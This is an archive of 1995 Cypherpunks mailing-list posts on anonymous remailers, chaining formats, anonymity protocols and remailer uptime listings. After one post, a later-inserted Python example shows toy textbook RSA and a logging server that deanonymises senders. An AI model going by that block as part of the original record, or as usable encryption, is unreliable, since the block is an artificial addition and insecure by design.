PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Mon, 6 Feb 95 00:04:41 PST
To: Network Security Observations <NSO@delphi.com>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <01HMPOWDUA1M91MP0I@delphi.com>
Message-ID: <9502060806.AA07087@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE Network Security Observations <NSO@delphi.com>:
# Henry,
# I would like to publish the working doc. in the next available issue 

Go ahead; I place the document in the public domain.

# of Internet Security Monthly. Obviously with a request to respond.

It would be kind if you sent me a copy of the issues that discuss it.
I'm not familiar with the journal.  If it's on paper, ask for my USPS address.

# Do you have any further material that you prefer to go along with it ?

Nope, that says what I have to say right now.  

The followup discussion on Cypherpunks has been helpful to me;
the punks mostly made good points and correct observations.  


		best regards, strick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 6 Feb 95 00:23:33 PST
To: cypherpunks@toad.com
Subject: Remailer msgs ideath -> rebma don't work.
Message-ID: <199502060821.AA08985@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Remailer messages sent via remailer@ideath.goldenbear.com to 
remailer@rebma.mn.org are failing; the system which handles my
mail upstream can't seem to connect to rebma. I'm going to try
to get things ironed out, but until then the ideath -> rebma path
should be avoided.

Sorry for any inconvenience; the bounced messages have been
discarded.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <MIKEINGLE@delphi.com>
Date: Sun, 5 Feb 95 22:17:10 PST
To: cypherpunks@toad.com
Subject: New directions in anonymity (needed)
Message-ID: <01HMPLWWZOXU90B2L7@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been a lot of talk about anonymity and the best ways of providing
it recently. Anonymity now is about where cryptography was before Diffie and
Hellman's paper, or untraceable transactions before Chaum. To use it, you
have to trust someone, or at least a group of people.

All of our anonymous systems boil down to only two techniques: indirection
and broadcast. Indirection is sending a message through one or more
intermediate nodes to conceal its point of origin. Broadcast is sending a
message to multiple recipients to conceal the intended recipient.

Indirection is somewhat secure for anonymous-to-known messaging. Properly
done, all intermediate nodes must be compromised to reveal the anonymous
sender. It is entirely broken for allowing replies to an anonymous person.
To allow a reply, a traceable path must exist back to the anonymous person.
Having obtained whatever piece of data is used to send a reply, the attacker
can trace this back one node at a time. Kludge all you want, but there is no
good solution to this. You can make the path disappear when it is used, but
if the attacker gets it first, there is nothing you can do.

Broadcast is exactly as secure as it is nonscalable. If you broadcast to 100
people, an attacker's uncertainty is one in 100. The security grows linearly
with the overall bandwidth. For cryptographic-level security, it would need
to grow exponentially with bandwidth.

Anonymity needs something fundamentally new, something comparable to public
key for cryptography or blind signatures for digital cash. Suppose a server
has a large file. A message comes in and is combined into this file. Another
message comes in with a key to retrieve data. The server processes the
retrieval key against this large file and comes up with an output, which it
returns to the person doing the retrieving. This output contains the input
message, transformed in such a way that even the server cannot match it
to the input that produced it. This is what we need.

It would require three keys: an encryption key, a selection key, and a
decryption key. The sender uses the recipient's encryption key to encrypt
the message, then sends it to the server. The server mixes the message into
its file, but cannot identify the encrypted file as destined for a
particular recipient. The recipient's selecting key extracts the data, but
the data extracted does not resemble the data the sender sent. The
decryption key, kept private by the recipient, is necessary to return the
data to its original form. The server must be unable to link the data from
the sender to the data sent to the recipient, and this is the hard part.

A method like this would permit anonymity without trust, much as public key
allows secrecy without trust and digicash allows transaction privacy without
trust. Is there any way to do it? There are functions like the Fourier
transform that can distribute data over a large file, but the inverse
function gives you back the same data. We need the not-so-inverse function
to give back a different piece of data, but one that can be converted, by a
private key, into the original, which the server never sees.

						Mike

P.S. Have any of the "beta testers" actually tested RSAREF for Perl?
RSA gave me permission to call the random number and DES routines, so I am
ready to add that in and release the code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 5 Feb 95 16:28:47 PST
To: cypherpunks@toad.com
Subject: Re: BROKEN REMAILERS
Message-ID: <199502060028.AA09342@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502051758.MAA02142@bb.hks.net> nobody stated:

: I have tested remailers and their PGP keys over some time now and this is
: what I have found:	

: USURA is really quick too and has lately been reliable. But it has always
: suffered from the same problem as Nately, namely that it will truncate all
: of the remaining lines in a PGP message encrypted with its own public key,
: this making it impossible to chain effectively.  It will read the first 
: command only.  It DOES forward all attached files, however (by which I 
: mean text that have been tagged on OUTSIDE of the pgp block encrypted
: to Usura).

I did some testing myself and the format below did work for me:
(I encrypt using " pgp -eat ")

->

To: remailer@xs4all.nl

::
Encrypted: PGP

----BEGIN PGP MESSAGE----
::
Anon-To: usura@replay.com

::
Encrypted: PGP

----BEGIN PGP MESSAGE----
::
Anon-To: usura@dds.nl

test of chained message
----END PGP MESSAGE----
----END PGP MESSAGE----

THIS IS OUTSIDE THE PGP MESSAGE

<-

This drops a message in my dds.nl mailbox stating:

->

test of chained message
THIS IS OUTSIDE THE PGP MESSAGE

<-


Hope this helps,
--
Alex de Joode					    
usura@replay.com	                            
http://www.xs4all.nl/~usura                PARTIE PIEPEL MOEF JOR FIET !!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 6 Feb 95 00:08:52 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <01HMPLWWZOXU90B2L7@delphi.com>
Message-ID: <199502060810.DAA27099@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle writes:
[...]
> Anonymity needs something fundamentally new, something comparable to public
> key for cryptography or blind signatures for digital cash. Suppose a server
> has a large file. A message comes in and is combined into this file. Another
> message comes in with a key to retrieve data. The server processes the
> retrieval key against this large file and comes up with an output, which it
> returns to the person doing the retrieving. This output contains the input
> message, transformed in such a way that even the server cannot match it
> to the input that produced it. This is what we need.
[...]

In a naive model, the sender could encrypt the message with two distinct 
public keys belonging to the intended recipient. The server shuffles the
result randomly with all its other messages. The recipient sends the private
key associated with the outer layer of encryption to the server, which in
turn finds something to decrypt with that key. Finally the recipient receives
the singly-encrypted message, and uses her other private key to decipher the
message. This still places full trust in the server, though.

It's trivial for the server to log each incoming message separately, noting 
the sender, in addition to combining it with the melange of all received 
traffic as expected. Thus the protocol above fails, since the server can
simply test-decrypt each distinct original file with the private key supplied
by the intended recipient, thereby linking the ends of the communication. 

So the function computed on the melange file and the recipient-supplied key 
must not do anything extraordinary when applied to the original message and 
the recipient key. Actually, it's much worse than that. The server could 
create a mock melange file, combine each original message with it, then apply
the extraction function to each resulting melange and the recipient key. Since
the recipient has no control over the previous state of the melange file, prior
to the arrival of the message for her, the extraction function can't depend in
any detailed way upon the contents of the melange. Therefore, I believe it's
impossible to specify an extraction function immune to melange spoofing by the
server.

-L. Futplex McCarthy, seeking summer employment in computer science; background
 mainly in theoretical CS, but open to many alternatives [private email please]
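
[Added example, not part of the original message and not any list member's code: the naive two-key scheme described above, with an honest server and with one that logs each submission and test-decrypts it when the recipient hands over the outer private key. Toy textbook RSA over constructed Mersenne-prime moduli stands in for real public-key encryption; the party names, function names and 32-bit checksum framing are assumptions.]

```python
import hashlib
import random

E = 65537  # public exponent shared by every toy key


def mersenne(k):
    return (1 << k) - 1  # 2^k - 1, prime for the exponents used below


def make_key(p, q):
    """Toy textbook-RSA key from two known primes (constructed, NOT secure)."""
    return {"n": p * q, "d": pow(E, -1, (p - 1) * (q - 1))}


def tag(x):
    """32-bit checksum so a holder of the right key can recognise a hit."""
    return int.from_bytes(hashlib.sha256(str(x).encode()).digest()[:4], "big")


def seal(msg, inner_n, outer_n):
    """Sender: encrypt under the recipient's inner key, then the outer key."""
    inner = pow(int.from_bytes(msg, "big"), E, inner_n)
    return pow((inner << 32) | tag(inner), E, outer_n)


def open_outer(blob, outer):
    """Strip the outer layer; None if this key does not fit the blob."""
    if blob >= outer["n"]:
        return None
    framed = pow(blob, outer["d"], outer["n"])
    inner, check = framed >> 32, framed & 0xFFFFFFFF
    return inner if tag(inner) == check else None


def open_inner(inner, key):
    """Recipient: remove the inner layer with the key the server never sees."""
    m = pow(inner, key["d"], key["n"])
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


class Server:
    def __init__(self, keep_log):
        self.keep_log = keep_log
        self.pool = []    # the shuffled "melange" the protocol expects
        self.log = []     # (sender, blob) pairs a dishonest server also keeps
        self.links = []   # (sender, recipient) pairs the server has learned

    def submit(self, sender, blob):
        if self.keep_log:
            self.log.append((sender, blob))
        self.pool.append(blob)
        random.shuffle(self.pool)

    def retrieve(self, requester, outer_key):
        # Test-decrypt every logged original with the key just handed over.
        for sender, blob in self.log:
            if open_outer(blob, outer_key) is not None:
                self.links.append((sender, requester))
        # The step the protocol asks for: find the blob this key opens.
        for blob in self.pool:
            inner = open_outer(blob, outer_key)
            if inner is not None:
                self.pool.remove(blob)
                return inner
        return None


def run_demo(keep_log):
    # Constructed parties and messages; every modulus uses distinct primes.
    bob = {"inner": make_key(mersenne(31), mersenne(61)),
           "outer": make_key(mersenne(107), mersenne(127))}
    dave = {"inner": make_key(mersenne(19), mersenne(89)),
            "outer": make_key(mersenne(521), mersenne(607))}
    server = Server(keep_log)
    server.submit("alice", seal(b"meet at 9", bob["inner"]["n"], bob["outer"]["n"]))
    server.submit("carol", seal(b"hello dave", dave["inner"]["n"], dave["outer"]["n"]))
    inner = server.retrieve("bob", bob["outer"])
    return open_inner(inner, bob["inner"]), server.links


if __name__ == "__main__":
    print(run_demo(keep_log=False))  # shuffled pool only: no sender link
    print(run_demo(keep_log=True))   # logging server links alice to bob
```

[Bob recovers the same plaintext in both runs, so nothing he can observe tells him whether the server kept the log.]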



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 6 Feb 95 00:47:19 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Legal implications of one-of-a-group guilt
In-Reply-To: <199502060743.XAA01417@netcom14.netcom.com>
Message-ID: <199502060849.DAA27258@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:		[welcome back, Tim]
> The Internetpol may _suspect_ that one of these 10,000 readers is the
> person to whom the message is intended, but cannot _prove_ it. Even
> if the list of readers is down around 100, I know of no legal systems
> that would accept this as proof.

Well, I'm not so sure. DNA fingerprinting has soared in popularity for
criminal cases over the last decade or so. From the figures I vaguely recall
being quoted, such evidence of a DNA match narrows down a list of
suspects to a mere few hundred thousand people, and is commonly admitted into
evidence. This situation is reminiscent of that phenomenon, IMHO.

I imagine that the looser standard of evidence in civil cases would make such
information quite significant in determining "the preponderance of evidence".

It would be interesting to hear from some folks with legal training on this 
issue, if only to correct my mistakes. IANAL.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 03:55:41 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Cooperation
In-Reply-To: <Pine.3.89.9502060545.E19655-0100000@ivy.bga.com>
Message-ID: <199502061154.DAA11069@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> But there is a major difference between active cooperation and agreeing to
> a standard.  Active cooperation is just that--something which cannot be
> automated, or which involves automated judgement decisions.  I claim that
> my ideas are merely standards.  A standard which might even be extendable
> into the dominions of a hostile government.

Yes! Standards are not collusion. In fact, standards can lessen the
amount of ad hoc contact needed between remailer operators, and thus
reduce somewhat the prospects for compromise and collusion.

Robust standards are also helpful for building "hands-off" remailers,
in which remailer account owners take a hands-off approach, possibly
even to the point of creating the accounts and then never checking
again.

The proposals I've made, sometimes called a "Remailer's Guild," were
not for a cabal, but for a market standard that would tend to reward
those who follow certain standards and punish (all in a market sense)
those who flout standards just for the sake of being different.

(The real idea was to get some progress on deciding on some features
and terminology, to the point that a "Release" version could be
produced, like PGP 2.6, for example.)

It may be that such convergence on standards can be done without any
contact at all, just through market forces and things like pinging
scripts. The remailer analog of a self-healing network, rerouting
around brain-damaged sites.

--Tim May, posting at 3:55 a.m. because this is my jet lag rebound
period, in which I can't go to sleep because I slept for 11 hours upon
my arrival at home


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an448@freenet.carleton.ca (Yves Bellefeuille)
Date: Mon, 6 Feb 95 01:33:14 PST
To: cypherpunks@toad.com
Subject: Re: Legal implications of one-of-a-group guilt
Message-ID: <199502060933.EAA16328@freenet2.carleton.ca>
MIME-Version: 1.0
Content-Type: text/plain


>Well, I'm not so sure. DNA fingerprinting has soared in popularity for
>criminal cases over the last decade or so. From the figures I vaguely recall
>being quoted, such evidence of a DNA match narrows down a list of
>suspects to a mere few hundred thousand people, and is commonly admitted into
>evidence. This situation is reminiscent of that phenomenon, IMHO.
>
>I imagine that the looser standard of evidence in civil cases would make such
>information quite significant in determining "the preponderance of evidence".
>
>It would be interesting to hear from some folks with legal training on this 
>issue, if only to correct my mistakes. IANAL.

Well, I missed the beginning of this, but here's the general principle.
Any evidence is admissible which makes it more likely that whatever you're
trying to prove is true rather than untrue.

For example, I want to prove that you stole my watch. I can prove that the
thief is a man: since you are a man, this makes it more likely than before
that you are the thief. It doesn't prove that you did it, but it goes in
that direction -- it narrows it down. Okay? 

Now, here's the important corollary. If the jury is likely to give undue
weight to the evidence, it can be inadmissible even though it would be
admissible under the general principle. Lie detector tests are a good
example of this, at least in Canada: they're not admissible, and the
reason they're not admissible isn't because they don't prove with 100 %
certainty, but because the jury is likely to think they're much more
reliable than they actually are. 

Since I have no idea what the original topic was, I leave it to you to
apply these general rules to your specific concern as an exercise. :-)

Disclaimer: Since I'm in Canada, obviously I can't give any advice
regarding US law.

Regards,

--
Yves Bellefeuille, Ottawa, Canada
an448@freenet.carleton.ca (finger here for PGP key)
ua294@fim.uni-erlangen.de




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 02:00:36 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Excerpts of signed messages
In-Reply-To: <199502060423.UAA18043@jobe.shell.portal.com>
Message-ID: <199502061000.FAA01701@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> (I forget if this was posted here last year, it sounds familiar.)

Some of us are relatively new to the list...
> 
> Suppose I get a PGP-signed flaming message, full of insults, and at the
> end it says, sarcastically, "For a stupid moron, you've made some very
> nice postings."  I could choose to excerpt this last part, "...you've made
> some very nice postings", and exhibit it in signed form.  What I would do

In other words, you'd like to retain an excerpt from the message with the
signature still intact?

Problem with that is how do you prevent one from creating a cleverly made
excerpt that distorts what one is saying (but has a valid signature)? It
seems your example does this very thing.

Better to quote the unsigned portion but retain the original signed message
as evidence that the excerpt is Ok.

[ Snip! ]

> The checker would know he was dealing with an excerpt, and that it came
> from the end of the message, but he would have no way of knowing what
> was in the part that was removed.

That's the problem, of course.

> 
> Hal
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 02:03:53 PST
To: harmon@tenet.edu (Dan Harmon)
Subject: Re: dna ink
In-Reply-To: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <199502061003.FAA01784@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I just saw an item on CNN about a company in LA called Art Guard.  It 
> sells an ink that is created using your dna as a protection against 
> forged signatures.
> 
> Interesting.

Yes, I've seen that too. They insisted it will always be secure, especially
if one keeps changing the ink...

...probably will be until DNA cloning becomes cheap and accessible...

BTW, I think that company also had other ideas to use cheap cloning technology
such as distributing icons of famous people (Jerry Garcia was an example) that
had bits of their DNA in them... 

> 
> Dan
> 
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 02:26:23 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <199502060431.UAA18798@largo.remailer.net>
Message-ID: <9502061025.AA03724@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Perry advocates IPSP as an almost-panacea for Internet security.  I
> disagree.

Well, no; it doesn't fix things like mail for which the data needs to
be protected but not the link. However, I think I can answer some of
your other objections...

> TIA on netcom.

TIA is sort of a short term hack people are using to get around having
to have their administrators manage SLIP or PPP properly; I suspect
this difficulty will vanish with time.

> It's fallacious to argue simply that everyone's going to be _on_ the
> Internet soon enough anyway,

Well, IBM of all firms is trying very hard to make sure you are, and
Microsoft is even investing in UUNet to try to make sure of it, too.

Remember, by the way, that PPP is far cheaper per customer than shell
accounts, even though moronic providers right now don't make it look
that way.

IP is ultimately designed to be a proxy protocol that will work over
anything -- stuff like TIA simply gets around temporary mental
difficulties among providers in seeing things that way...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 6 Feb 95 03:30:23 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502060510.C19655-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic differences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so astutely points out:
in your model, if the first remailer is bad, the message is compromised.
If users encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severely limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, until traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Deitweiller
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indeed.  The reason we chain is because we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This requires remailer operators to
>cooperate to some extent to validate one another's remailer keys, but
>does confer the great advantage of portable remailers as mentioned
>above; if I run a trusted remailer on one machine, I can move it to
>another machine, and as soon as I advertise the new address and the PGP
>public key, it is a trusted and useful part of the froth.
 
Actually, there may be something here.  I don't know about you all, but my
PGP isn't very happy about all these new remailer keys.  We could agree to
the following standard:  Signing a remailer's key means that you believe
the remailer to be secure.  Trusting a remailer key means trusting the
remailer operator to validate other remailers' security.  This adds a whole
new meaning to the phrase, "key compromise certificate".
 
 
>While we are advertising a PGP key and internet address, we might as
>well incorporate other useful information. For instance, remailers could
>advertise their maximum latency. 
 
While I agree that it is useful to post the operating characteristics of
the remailers, the maximum latency must theoretically be infinite in the
standard model to prevent flushing attacks.
 
>    Kevin
 
 
 
Hal <hfinney@shell.portal.com>:
 
 
>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  
 
Hear ye, hear ye!  And along those lines...
 
I'm sketchy (at best) by what is meant by "pinging" a remailer.  Would it
not be possible for live-on-the-net remailers to accept a (socket?) quick
check to see if they are online?  If so, then the ping would only work if
the remailer was active when tried.  Furthermore, client software could
startup by sending out these pings, and presenting only responding
remailers to the user--with an exception list for those not "live".
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 6 Feb 95 03:31:24 PST
To: cypherpunks@toad.com
Subject: Cooperation
Message-ID: <Pine.3.89.9502060545.E19655-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal:
   I agree that it is to our advantage to minimize the cooperation between
remailers, for the following reasons:
 
1)  The existence of a cabal dominating such a function admits the
possibility of the abuse of power, for whatever reason.
 
2)  The requirement of cooperation between remailers limits the size of the
remailer net to the number of operators that can effectively cooperate with
each other.  (Yes, we can extend via overlapping groups, but this
introduces chokepoints--another weakness.)
 
3)  The requirement of cooperation between remailers raises the cost (in
time and legal vulnerabilities) to enter the remailer net.
 
4)  Failing all of these, there is a real chance (happening even now) that
users will trust the operators too much.
 
 
But there is a major difference between active cooperation and agreeing to
a standard.  Active cooperation is just that--something which cannot be
automated, or which involves automated judgement decisions.  I claim that
my ideas are merely standards.  A standard which might even be extendable
into the dominions of a hostile government.
 
Nathan
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 6 Feb 95 06:49:53 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199502061450.GAA28746@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut";
$remailer{"charon"} = "<charon@styx.jpunix.com> cpunk hash latent cut ek";
$remailer{"bonafide"} = "<remailer@bonafide.jpunix.com> cpunk hash latent cut ek";
$remailer{"ford"} = "<ford@prefect.jpunix.com> cpunk hash latent cut ek";
$remailer{"aegis"} = "<aegis@athena.jpunix.com> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

JPUNIX.COM offers a domain hiding service for remailers. Send email to 
perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not 
run a remailer. All subdomains of jpunix.com on this list are remailers 
that are not physically located on jpunix.com

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 6 Feb 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
rahul    homer@rahul.net                  -*+****#-*+#    19:19  99.88%
alumni   hal@alumni.caltech.edu           +****-*##* #     9:02  99.87%
eniac    vanklava@eniac.ac.siue.edu         #***+#***#     6:06  99.88%
penet    anon@anon.penet.fi               *+**+*+++-+*  1:40:22  99.99%
tower    remailer@tower.techwood.org        *********#     7:38  99.88%
mix      mixmaster@nately.ucsd.edu        --*-++++++++    43:06  99.85%
nately   remailer@nately.ucsd.edu         --++++++++++    41:00  99.85%
portal   hfinney@shell.portal.com         +***#-*##* #     6:53  99.85%
xs4all   remailer@xs4all.nl               **-*+++**+**    16:46  99.75%
charon   charon@styx.jpunix.com               #-++-*      26:06  99.78%
bonafide remailer@bonafide.jpunix.com           ##****     6:39  99.68%
ford     ford@prefect.jpunix.com                ++-+++    27:13  99.67%
soda     remailer@csua.berkeley.edu       .--.._.....   9:02:42  99.56%
myriad   remailer@myriad.pc.cc.cmu.edu     +***-******    37:47  99.37%
vox      remail@vox.xs4all.nl             ...---..--   22:10:50  99.51%
usura    usura@replay.com                 *+-****+ ***    15:05  98.98%
aegis    aegis@athena.jpunix.com                          15:55  99.07%
